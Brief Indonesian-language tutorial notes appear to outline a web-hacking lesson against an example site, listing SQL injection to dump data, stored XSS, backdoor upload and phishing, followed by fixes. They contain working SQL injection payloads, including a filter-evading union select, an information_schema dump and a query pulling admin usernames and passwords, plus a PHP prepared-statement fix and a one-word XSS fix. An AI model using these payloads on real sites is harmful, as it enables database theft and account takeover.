Website Contoh https://sharingilmu.my.id/

SQL INJECTION -> DUMP DATA
XSS STORED --> LOGIN ADMIN
UPLOAD BACKDOORING -->
PHISING

MEMPERBAIKI SQL INJECTION
MEMPERBAIKI XSS STORED
MEMPERBAIKI UPLOAD BROKEN

---HAL-HAL YANG DI PERLUKAN---
command SQL INJECTION via Chrome
order by 1
-{id}' union /*!50000Select*/ 1,2,3,4,5,6,7-- -

concat%0b(@c:=0x00,if((select%20count(*)%20from%20/*!50000information_schema*/.columns%20/*!50000where*/%20table_schema%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@c:=concat%0b(@c,0x3c62723e,/*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c)

group_concat(username,0x3a,password) // +from+tbl_admin-- -

---perbaikian sql injection---
$conn = koneksi();
$id = $_GET['id'];

// Persiapkan statement SQL
$stmt = mysqli_prepare($conn, "SELECT * FROM post WHERE id = ?");

// Binding parameter
mysqli_stmt_bind_param($stmt, 'i', $id);

// Eksekusi query
mysqli_stmt_execute($stmt);

// Mendapatkan hasil
$result = mysqli_stmt_get_result($stmt);
$data = mysqli_fetch_assoc($result);

$tag = $data["tag"];
$parsedown = new Parsedown();
$relateds = relatedPost($data);
$relateds_count = count($relateds);

// Jangan lupa menutup statement dan koneksi setelah selesai
mysqli_stmt_close($stmt);
mysqli_close($conn);

--perbaikan xss---
htmlspecialchars

